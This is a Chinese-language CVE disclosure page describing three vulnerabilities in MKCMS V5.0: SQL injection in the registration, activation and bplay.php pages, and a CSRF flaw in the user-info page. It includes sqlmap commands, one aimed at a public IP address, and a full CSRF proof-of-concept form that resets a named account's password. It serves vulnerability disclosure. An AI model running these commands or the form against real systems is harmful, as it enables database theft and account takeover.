CVE中文申请站

CVE-2019-12859:MKCMS V5.0存在SQL注入漏洞

一、漏洞摘要

漏洞名称: MKCMS V5.0存在SQL注入漏洞
上报日期: 2019-05-29
漏洞发现者: zhhhy
产品首页: https://micool.net/1090.html
软件链接: https://www.lanzous.com/i2ipcre
版本: V5.0
CVE编号: CVE-2019-12859


二、漏洞概述

1、漏洞存在在http://127.0.0.1/ucenter/reg.php 中 name字段。漏洞URL:http://127.0.0.1/ucenter/reg.php
2、漏洞存在在http://127.0.0.1/ucenter/active.php 中 verify字段。漏洞URL:http://127.0.0.1/ucenter/active.php?verify=a
1.png

三、利用方法

下面以reg.php 中 name字段为例,先使用burp抓取如下数据包
2.png
然后保存为post.txt
3.png

使用sqlmap获取数据
4.png

源码分析:
上面的文章中提到了,在注册页面存在注入。增加了几条输出语句来观察一下语句拼接的情况。
5.png
其实该CMS对GET和POST参数都进行了处理,然鹅,不知道什么原因,又把转义给去除了
6.png
处理也是有限的,只是对特殊字符串进行转移,以至于无法防御后面的数字型注入。
7.png

active.php 中 verify字段可使用sqlmap获取数据
sqlmap.py -u 106.14.144.32:1777/ucenter/active.php?verify=a --dbs
8.png

四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/226/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12859
exploit-db:发布中

CVE-2019-11078:MKCMS V5.0存在CSRF漏洞

一、漏洞摘要

漏洞名称: MKCMS V5.0存在CSRF漏洞
上报日期: 2019-04-04
漏洞发现者: cisk
产品首页: https://micool.net/1090.html
软件链接: https://www.lanzous.com/i2ipcre
版本: V5.0
CVE编号: CVE-2019-11078


二、漏洞概述

CSRF: ucenter/userinfo.php
post请求中没有带token,也没有验证Referer,导致产生csrf漏洞
6.png

三、利用方法

构造如下poc.html,并访问poc.html;将修改lduo123账号的密码

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://v.micool.top/ucenter/userinfo.php" method="POST">
      <input type="hidden" name="u&#95;name" value="lduo123" />
      <input type="hidden" name="u&#95;password" value="123456" />
      <input type="hidden" name="u&#95;phone" value="1314520" />
      <input type="hidden" name="u&#95;qq" value="" />
      <input type="hidden" name="u&#95;email" value="admin&#64;gmail&#46;com" />
      <input type="hidden" name="save" value="" />
      <input type="submit" value="Submit request" />
    </form>    
  </body>
</html>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/193/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11078
exploit-db:发布中

CVE-2019-10707: MKCMS V5.0存在SQL注入漏洞

一、漏洞摘要

漏洞名称: MKCMS V5.0存在SQL注入漏洞
上报日期: 2019-03-30
漏洞发现者: sueyuDen
产品首页: https://micool.net/1090.html
软件链接: https://www.lanzous.com/i2ipcre
版本: V5.0
CVE编号: CVE-2019-10707


二、漏洞概述

下载源码后本地搭建。
1.png
漏洞存在在http://127.0.0.1/mkcms/bplay.php
漏洞URL:http://127.0.0.1/mkcms/bplay.php?play=1
用sqlmap跑
sqlmap命令:python2 sqlmap.py -u "http://127.0.0.1/mkcms/bplay.php?play=1" --batch --dbs
2.png
3.png
可以跑出库名,表名,字段等等。
4.png
源码分析:
打开bplay.php
5.png
漏洞语句在第四行
可以看到这里它对play参数没有做过滤的就直接带入了sql语句,从而导致了sql注入。

三、利用代码

exp代码如下:
sqlmap命令为

python2 sqlmap.py -u "http://127.0.0.1/mkcms/bplay.php?play=1" --batch --dbs


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/181/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10707
exploit-db:发布中